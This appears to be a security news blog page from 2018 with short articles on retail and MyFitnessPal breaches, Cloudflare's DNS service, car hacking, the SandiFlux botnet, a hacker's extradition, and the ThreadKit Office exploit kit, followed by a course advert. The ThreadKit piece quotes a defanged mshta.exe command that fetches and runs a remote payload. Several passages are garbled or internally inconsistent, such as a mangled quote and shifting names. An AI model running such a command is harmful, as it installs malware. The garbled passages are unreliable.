Monday, May 19, 2025
Home Blog Page 917

Hackers Stole Millions of Payment Card Data From Saks Fifth Avenue, and Lord & Taylor Stores

Hackers Stole Millions of Payment Card Data From Saks Fifth Avenue, and Lord & Taylor Stores

Millions of customer data including the payment card details stolen by hackers at certain Saks Fifth Avenue, Saks OFF 5TH, and Lord & Taylor stores that located in North America.

They are currently investigating the issue and there is no indication that it affects company’s e-commerce or other digital platforms, Hudson’s Bay, Home Outfitters, or HBC Europe.

HBC identified the issue and has taken steps to contain it” reads the company statement.” once the company has more clarity around the facts, it will notify customers quickly and will offer those impacted free identity protection services, including credit and web monitoring. “

Also, the company confirmed that no indications of Social Security or Social Insurance numbers, driver’s license numbers, or PINs have affected in the data breach.

HBC said that they were working leading data security investigators to get the customer’s information and their current investigation in progress.

The breach was highlighted by Geminiadvisory, according to their analysis of the data available ” the entire network of Lord & Taylor and 83 Saks Fifth Avenue locations have been compromised. The majority of stolen credit cards were obtained from New York and New Jersey locations”.

Saks Fifth Avenue

Geminiadvisory estimate the breach may occur between May 2017 to present.Hacking JokerStash syndicate announced the sale of compromised records on On March 28, 2018.

“Using our analytical tools, that were specifically developed so as to empower money firms to watch assets portfolio exposure at intervals the deep & darknet, we’ve got established with a high level of confidence that victims of the attack area unit Saks avenue, Saks avenue OFF fifth, a reduced outlet of the posh sales outlet Saks Fifth Avenue, and Lord & Taylor Stores” says Geminiadvisory.

Saks Fifth Avenue

Geminiadvisory says at the time of writing approximately 35,000 records for Saks Fifth Avenue and 90,000 records for Lord & Taylor.

As a safety practice customers are recommended to closely monitor their account statements. If any unauthorized transaction detected you should notify your card issuer immediately.

Cloudflare Announced Internet’s Fastest DNS Service 1.1.1.1 that Extremely Focus on Consumer Privacy

Cloudflare Announced Internet’s Fastest DNS Service 1.1.1.1 that Extremely Focus on Consumer Privacy

Cloudflare announced DNS service 1.1.1.1 for everyone and to note this is the first service consumer-focused service offered by Cloudflare.

According to DNSPerf 1.1.1.1 rank’s number of one and it is faster than anything else.For all the Ip4 address you can use the resolver 1.1.1.1 and 1.0.0.1, for IPv6, the resolvers are 2606:4700:4700::1111 and 2606:4700:4700::1001.

Cloudflare reduces the latency by building the data centers all around the globe. “we want everyone to be within 10 milliseconds of at least one of our locations“. Instead of using centralized cache it uses the innovative distributed cache.

With DNS service 1.1.1.1, Cloudflare also enhances privacy-protection mechanisms, they are not writing the querying IP addresses to disk and wipes all the logs within 24 hours and the transactions with a week.

Cloudflare says “We will never log your IP address (the way other companies identify you). And we’re not just saying that. We’ve retained KPMG to audit our systems annually to ensure that we’re doing what we say“.

Why they launched service on April 1st “they planned to reach a wider audience and the same time it has 4 1s“. Cloudflare says “the product was built to make the Internet better, more secure, more reliable, and more efficient“.

With DNS service 1.1.1.1 one can query the non-Cloudflare domain names with 14ms globally, and for the domain’s using Authoritative Cloudflare DNS there be added benefit as the resolver and the recursor in the same network.

We have tested 8.8.8.8 and 1.1.1.1 here is the result. Integration is very easy and it can be done in minutes without any third party software.

Cloudflare also published a guide on how to configure the service on iPhone, MacOS, Android, Windows, Linux, and Router. The easily rememberableDNS service 1.1.1.1 is a joint venture of Cloudflare and APNIC. Cloudflare provides the IP address and APNIC had the IP address (1.1.1.1).

Yet another free service “Quad9” that launched last year November, keeps blocking you against known malicious domains and prevents your computer and IoT devices from connecting to malware or phishing sites.

To use Quad9 DNS service change your computer preferred DNS server to 9.9.9.9, then your request will be routed through Quad9 DNS instead of your ISP default DNS.

Modern Cars are Vulnerable to Hacking and Malware Attack

Modern Cars are Vulnerable to Hacking and Malware Attack

Today convicted Modern cars are using a lot of technology and it always connected with internet that makes it extremely vulnerable and easy to compromise using Malware attacks and other security flaws that presented in the IoT Devices that connected with Modern cars.

Connected cars are rapidly increasing and multiple IoT devices are connected to the car that needs to communicate remotely in order to operate the users from Wifi and other drive assistance.

Automotive security field involved with a lot of security risks since Modern cars are exposed a lot of vulnerability that leads to face the High-security risks as other connected devices.

Also Read: Beware – Dangerous IoT Attacks Leads Some One to Hack and Control Your Car

Major Modern Cars Security Risk

Modern Cars
Image Courtesy: McAfee

Vehicle-to-Vehicle Communications

Vehicle-to-Vehicle Communications is established using Wireless network that allows making two vehicle’s successful communication on road and it allows to reduce the car speed if another vehicle comes closer.

In this case, Attacker could be abusing the flaw in the wireless communication technology and reduce the car speed and invaded by destructive malware and the V2V system becomes a vector, a malicious actor could create malware to infect many connected cars.

Controller Area Network Backdoor

Many cars are using controller area network (CAN) that using to communicates with a vehicle’s electronic control unit (ECU), which operates many subsystems such as antilock brakes, airbags, transmission, audio system, doors, and many other parts—including the engine.

Modern cars are using Diagnostic Version 2 port that used to diagnose problems with Mechanics and this could be abused by CAN traffic and intercepted from the OBD port.

So external OBD device could be plugged into a car as a backdoor for external commands, controlling services such as the Wi-Fi connection and unlock the door.

Malware and Exploits

Modern cars technology allows to connect the car with our smartphones to our cars, we add functions such as phone calls, SMS, and music and audiobooks.

Recent powerful Malware and exploits could compromise the device and firmware that will lead to compromise the car devices.

Car Theft and Key Fob Hacking

Key fob hacking is a procedure to enable an attacker to enter the car without softening up. This system is generally used by hackers and should be possible effectively with modest equipment.

In this case, attacker blocks the signal from the wireless key and lock the car and also reply the signal to compromise the car.

According to McAfee Research, One variant of the attack uses a jammer to block the signal. The jammer interferes with the electromagnetic waves used to communicate with the vehicle, blocking the signal and preventing the car from locking, leaving access free to the attacker.

Personal Data and Tracking

Connected Cars are kept recording the more sensitive personal data about the drivers from the external devices such as hone, and can include contact details, SMS and calls history and even musical tastes that connected to the cars.

These data are used by the companies, cybercriminals, and Governments to use it for various purposes such as spying and tracking the people, marketing or insurance contracts.

Fake Car Data

Advanced data can be adjusted and faked. By adjusting information, for example, contamination tests or execution, organizations results to increase sales Additionally, drivers could change auto insights, for example, separate set out to trick insurance agencies or future purchasers.

SandiFlux – Hackers using Fast Flux Method in Wild For Malware Distribution

SandiFlux – Hackers using Fast Flux Method in Wild For Malware Distribution

Hackers started using Fast Flux infrastructure in wild to hide the malicious activities such as malware and phishing campaigns. A new Fast flux infrastructure has been identified named as SandiFlux.

Fast Flux is a technique to have multiple IP addresses assigned to the same domain and they change consistently in quick sessions through DNS records.

Security researchers from Proofpoint identified a new Fast Flux infrastructure dubbed as SandiFlux used to distribute malware and it is acting as a proxy for Grand crab ransomware.

Starting from December researchers observed new fast flux domain nodes and they decided to monitor separately along with some events from the dark cloud. Also, threat actors moved from DarkCloud to Sandiflux.

DarkCloud/Fluxxy botnet is centralized in Ukraine and Russia (77.4% and 14.5%), whereas SandiFlux nodes are concentrated in Romania and Bulgaria (46.4% and 21.3% of the botnet, respectively) also from other countries including Europe, Africa, the Middle East, and southern Asia.
Sandiflux
Sandiflux Heatmap

Starting from March 27, 2018, researchers spotted GandCrab ransomware C&C servers uses proxified SandiFlux infrastructure.

Sandiflux
Grandcrab proxified C&C communication

Although we have not observed a single overlap between DarkCloud and SandiFlux in the last four months, we cannot confirm that the two infrastructures are unrelated,” researchers said.

DarkCloud botnet was first uncovered in 2016 and it continues to expand, the botnet contains a huge number of name servers and it continues to change IP every minute to avoid detection.

Researchers concluded that “DarkCloud/Fluxxy is the best documented, a new Fast Flux botnet has emerged with nodes of compromised hosts distributed much more widely. It is likely that both are operated by the same actor who rents capabilities to other actors“.

150 Million user Accounts Affected with MyFitnessPal Data Breach

150 Million user Accounts Affected with MyFitnessPal Data Breach

MyFitnessPal data breach affected more than 150 million user accounts. Attackers stole the usernames, email addresses, and hashed passwords.

The breach most likely happened in February this year and the company identified the unauthorized data access from their servers on March 25, 2018.

MyFitnessPal confirms payment cards were not affected by the breach as it is collected and processed separately. No government-issued identifiers such as Social Security numbers and driver’s license numbers were not affected because we don’t collect that information from users MyFitnessPal statement reads.

The identity of the unauthorized access not yet identified and they working with data security firms to investigate the unauthorized access.

Majority of their password encrypted with bcrypt and few of them with SHA-1, a 160-bit hashing function.

After understanding the scope of the attack they sent out notification email’s to the customers “to change their passwords immediately” and to provide details on how they protect their private data.

“We continue to monitor for suspicious activity and to coordinate with law enforcement authorities.We continue to make enhancements to our systems to detect and prevent unauthorized access to user information” MyFitnessPal statement reads.

29 Year Old Russian Hacker who accused of Hacking LinkedIn and Dropbox Extradited to United States

29 Year Old Russian Hacker who accused of Hacking LinkedIn and Dropbox Extradited to United States

29 year old Russian hacker Yevgeni Nikulin who charged for hacking into LinkedIn, Dropbox and Formspring was extradited to the United States from the Czech Republic on Last Friday.

He possibly compromised more than 100 million user accounts and he was charged for three counts of computer intrusion, two counts of causing damage to a protected computer, two counts of aggravated identity theft, one count of trafficking and one count of conspiracy.

Aleksandrovich Nikulin was arrested while in Prague in October 2016, in view of the global warrant issued by the US. After extradited to us he appeared in Federal District Court in San Francisco and not pleaded guilty to the charges against him reported NYTimes.

Nikulin’s layer’s argued that his case was politically motivated. Russia issued an arrest warrant for Mr. Nikulin in November 2016 for stealing $3,450 via WebMoney. His case turned into being a battle between Russia and United States.

29 year old Russian hacker Nikulin was arrested on Oct 5, 2016, by officials in the Czech Republic and he was accused by US Department of Justice for hacking computers belonging to LinkedIn, Dropbox, Formspring and obtaining information from them.

He gained access LinkedIn, Dropbox and Formspring during the time period of 2012-2013. If he gets convicted he could be sentenced for more than 30 years and penalize more than 1 million.

“This is deeply troubling behavior once again emanating from Russia,” Attorney General Jeff Sessions said in a statement. “We will not tolerate criminal cyber attacks and will make it a priority to investigate and prosecute these crimes, regardless of the country where they originate.

“We have every reason to believe and expect that Mr. Nikulin will be extradited to America says” Paul D. Rya, also he added the “United States has the case to prevail on having him extradited, whether it’s the severity of the crime”.

Cyber Criminals Hacked Major U.S. Mortgage Company Computer Servers to Steal Sensitive Data – FBI

Cyber Criminals Hacked Major U.S. Mortgage Company Computer Servers to Steal Sensitive Data – FBI

A Team of 4 Hackers who are resided in San Diego Infiltrated the Mortgage Company Computer Servers to steal the sensitive data between 2011 – 2014.

The Stolen information including loan application information from thousands of customers such as Social Security numbers, addresses, dates of birth, and driver’s license numbers and use it for various malicious activities.

Also Read: Attackers Distributing Dangerous Malware via YouTube to Steal Passwords

Hackers Used Fuzzing Technique

John Bade, A chief Hacker and one of the masterminds of this hacking Group compromise the mortgage companies using a well known common hacking technique called Fuzzing.

Fuzzing helps to overload a web server with massive amounts of data that can lead to the server revealing security loopholes.

In this case, “Once Baden had access to victims’ information, he and his conspirators, Victor Fernandez, Jason Bailey, and Joel Nava, went to work. Fernandez—the group’s ringleader—identified multiple victims’ brokerage accounts and took control of them by calling the companies and providing the victims’ personal information to change passwords and contact information. “

25,000 Compromised Victims

Later they will transfer the funds to an account that controlled by the Hackers form the victims account and sometimes they transferred up to $30,000.

Spoke Person from FBI said, Victims stretched from California to Florida, and one individual lost nearly $1 million in the scheme.

In this case, more than 25,000 victims were compromised by this hackers and FBI believes that it could be more than we expected and its impossible to calculate since There was so much retail fraud over such a long period of time.

“Investigators worked backward from the mortgage company, eventually identifying the hack—and the hackers. By that time, Baden was hiding in Mexico. In 2014, he was named to the San Diego FBI’s Most Wanted Cyber Fugitives list, and the reward offered in the case eventually led to his capture in Mexico, Christopherson said.”

According to FBI,  All four Hackers pleaded guilty to their roles in the fraud scheme. In 2015, Baden was sentenced federally to nine years in prison. In January 2018, Fernandez was sentenced to more than 10 years in prison. Bailey received a sentence of more than five years, and in February 2018, Nava was the last subject to be sentenced, to 44 months in prison.

Hackers Distributing Variety of New Exploits and Malware via Microsoft Office Document Exploit Kit

Hackers Distributing Variety of New Exploits and Malware via Microsoft Office Document Exploit Kit

Newly discovered Microsoft office document exploit kit contains a variety of recent exploits and Malware such as Lokibot, Formbook and tracking kit called such as ThreadKit targeting various organization and individuals around the world.

These Exploits kits are available in restricted underground crime forums and the cybercriminals are selling them at a different price.

They are used to spread a variety of malware payloads such as Trickbot and Chthonic, and RATs such as FormBook and Loki Bot and it also used for more sophisticated cyber attacks.

Also Read: Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market

Exploit Kit Activities in June 2017

Initially, ThreadKit starts its activities around mid of 2017 with many of powerful exploits such as EXE and DOC files inside of the VBS Script.

It contains an exploited CVE-2017-0199 and download and execute the payload from its command and control server and install the embedded Smoke Loader and Trick banking malware.

Downloaded Decoy document

Exploit Kit Activities in October 2017

During October 2017, ThreadKit Started advertising in the underground forum including with another Exploit CVE 2017-8759.

Later it communicates with C2 server to execute the embedded executable and additionally it integrating the new vulnerabilities.

Also, it using various technique to avoid detection and employee the advance method to avoid detection by modifying the registry key.

The registry value “z|#” contains the path to the parent malicious document

Exploit kit Activities November 2017

Since Nov 2017 ThreadKit starts its aggressive activities and employee with brand new Microsoft Office vulnerabilities.

It Advertised the inclusion of exploits targeting CVE 2017-11882 running un the following command: “mshta.exe hxxps://seliodrones[.]info/vmware/w&\x12\x0cC”

Exploit kit Activity in February/March 2018

Very recent activities of this Exploit kit in Feb/March contains a very new serious exploit such as Adobe Flash zero-day (CVE-2018-4878) and several new Microsoft Office vulnerabilities.

According to Proofpoint,  A new forum post in February 2018 announced that exploits for the recently disclosed CVE-2018-0802, as well as a July 2017 Office vulnerability (CVE-2017-8570), had been added to ThreadKit.

Main Distributing of the large spike of email campaigns with ThreadKit generated MS Office attachments that included these exploits.

“ThreadKit is a relatively new and popular document exploit builder kit that has been used in the wild since at least June 2017, by a variety of actors carrying out both targeted and broad-based crimeware campaigns. This new document exploit builder kit makes the use of the latest Microsoft Office exploits accessible to even low-skilled malicious actors. Proofpoint said.”

The Advanced Computer Hacker Professional Certification Course Bundle 2018

The Advanced Computer Hacker Professional Certification Course Bundle 2018

Cyber Attacks are evolving with more sophisticated and stealthy Techniques to compromise the Organization as well as individuals. To Prevent such cyber attacks as a Security professional you Should have learned more about current attack vectors and advance level Hacking skills. Here we introduce you a complete Cyber Security Course.

The IT Cyber Security course is an essential step towards earning the Ethical Hacker Certification, CISA, CISSP and CISM, CHFI security qualifications. This package is also one of the most cost-effective routes to IT cyber security excellence.

Also Read A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals

Today we are Introduced to you one of the best advance level cyber security course bundle which includes Computer Hacker Professional Certification Bundle for just $49 only.

Level Cyber security Certification Course will walk you through the skills and concepts you need to master Five elite cyber security certification exams: CEH, CISA, CISM, and CISSP, CHFI

Cyber Security Course

This course will take you through Advance level Ethical Hacking where you will go through 5 Additional $1500 Worth Bundle Course along with This Single Package for just for $49 with 1 year Unlimited Access

Here’s what you’ll get in these Five courses:

  1. Ethical Hacker Certification Training
  2. CISSP: Certified Information Systems Security Professional Training
  3. CISM – Certified Information Security Manager
  4. CISA – Certified Information Systems Auditor
  5. Computer Hacking Forensics Investigator Certification Training

Ethical Hacker Certification Training

To beat hackers, you have to think like them, and in this Cyber Security Course, you’ll master the skills of hacking and penetration in order to learn how to defeat malicious hackers. Companies of all sizes are constantly looking to improve IT security in this day and age, and this course will help you get qualified as an ethical hacker.

  • Access 19 comprehensive modules 24/7
  • Use enumeration to catalog system resources & potential routes to breach
  • Discuss automated tools for breaching security like Trojans, backdoors, viruses, worms, & DOS attacks
  • Learn the role of social engineering in stealing confidential information
  • Explore web-based attacks that can take online systems down
  • Understand how wireless network security can be breached & how hackers avoid protective measures like IDS, firewalls & honeypots

CISSP: Certified Information Systems Security Professional Training

The CISSP certification is a globally-recognized certification in the field of information security and has become a standard of achievement that is acknowledged worldwide.

Offered by the International Information Systems Security Certification Consortium, commonly known as (ISC)², CISSP is an objective measure of excellence, which requires a broad level of knowledge.

you’ll master the fundamentals of information systems security, and learn the skills you need to pass the CISSP exam. If you’re interested in tech and want to earn a great living securing networks, this course is for you.

  • The principles of access control and how they can be strengthened and applied to keep unauthorized users out of a system.
  • Telecommunications and network systems that need to be hardened to prevent data loss or theft.
  • The role that information governance and risk management play in raising security standards, and how they need to be applied to corporate information systems.
  • The importance of secure software architecture and design to help ensure that in-house systems protect data and resources.
  • Using cryptography to protect data in transit and prevent unauthorized access of files without the correct encryption keys.
  • Using security architecture and design principles to limit data access and potential angles of attack.
  • Monitoring, auditing and improving operations security to keep systems secure at the point of access.

CISM – Certified Information Security Manager

The demand for skilled information security managers is on the rise, and CISM is the globally accepted certification standard of achievement in this area.

The uniquely management-focused CISM certification ensures you are re-equipped with the best practices in the IT industry and recognizes your expertise to manage, design, and oversee and assess an enterprise’s information security.

  • How to establish and maintain an information security governance framework, and the processes required to support it.
  • How to manage information risks to an acceptable level to meet the business and compliance requirements of the organization.
  • Build, implement and operate an information security program that perfectly aligns with the wider information security strategy.
  • Planning the correct response to information security incidents, including defining the investigation and recovery steps required to minimize business impact.

CISA – Certified Information Systems Auditor

The CISA certification is renowned across the world as the standard of achievement for those who audit, monitor, access and control information technology and business systems.

Being CISA-certified showcases candidates for their audit experience, skills, and knowledge, and signifies that you are an expert in managing vulnerabilities, instituting controls and ensuring compliance within the enterprise.

  • The information systems audit process and how it is applied in a real-world environment.
  • The importance of applying information technology governance principles to maintain levels of security and availability.
  • Defining and managing the information systems and infrastructure life cycle to better plan for upgrades and replacements.
  • Codifying IT service delivery and support mechanisms and levels to ensure that systems and users remain fully productive and issues are properly prioritized.
  • Identifying critical information assets and designing systems to protect each from loss, theft or unauthorized access.
  • Building a business continuity and disaster recovery strategy that will help keep the organization running in the event of a major system failure.

Get This 5 Complete Advance Level Security Course Bundle for just $49

Computer Hacking Forensics Investigator Certification Training – Cyber Security Course

In this Cyber Security Course, you’ll learn about computer hacking forensics. Yes, sort of like what they do on CSI. This course begins with a look at the action required immediately after an attack has been identified, and then proceed to examine the in-depth procedures involved in investigating a hacking. If you have an interest in working on the legal side of computer hacking, this course is for you. Before you know it, you’ll be prepared to take and pass the CHFI certification exam.

  • Learn how to carry out an investigation according to industry best practices & legal guidelines
  • Cover searching & seizing resources as required for the investigation
  • Know how to handle digital evidence to maintain legal standards
  • Acquire & duplicate data to preserve evidence and facilitate further investigation
  • Use Access Data’s Forensic Toolkit (FTK), EnCase & special steps to review data whilst leaving all evidence intact
  • Understand steganography & how such techniques can be used to mask data theft